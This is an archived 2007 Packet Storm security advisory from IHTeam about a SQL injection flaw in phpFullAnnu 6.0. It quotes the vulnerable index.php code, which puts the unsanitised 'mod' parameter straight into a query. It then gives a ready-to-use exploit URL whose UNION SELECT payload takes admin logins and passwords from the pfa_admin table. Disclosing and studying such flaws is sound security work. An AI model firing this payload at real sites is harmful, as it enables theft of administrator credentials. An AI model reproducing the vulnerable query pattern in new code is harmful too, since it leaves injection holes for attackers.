phpfullannu-sql.txt

2007-09-25T00:00:00
ID PACKETSTORM:59537
Type packetstorm
Reporter IHTeam
Modified 2007-09-25T00:00:00

Description

                                        
                                            `#########################################################################################  
#  
# Inclusion Hunter Team  
# http://www.ihteam.net  
#  
#  
# [phpFullAnnu (PFA) 6.0]  
#  
#  
# Class: SQL Injection # Found: 22/09/2007 # Remote: Yes # Site: http://pfa.netsliver.com/  
# Download: http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz  
##########################################################################################  
  
  
  
Vulnerable code:  
index.php  
============================================================================================================  
  
$sqltitle = $bdd->readresult($bdd->request('SELECT h_title FROM  
'.$tbprefix.'heading WHERE h_mod = \''.$_GET['mod'].'\''));  
[...]  
//in /include/meta.inc.php  
<title><?php echo $title_site, ' - ', $sqltitle;...  
//So watch Title bar to see the injection  
============================================================================================================  
  
  
  
Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):  
===================================================================================================================  
  
http://www.site.com/[path]/?lang=fr&mod=login' UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin/*  
===================================================================================================================  
  
  
  
Thanks To:  
=================================  
White_Sheep for his Bugs Hunter;  
=================================  
  
  
`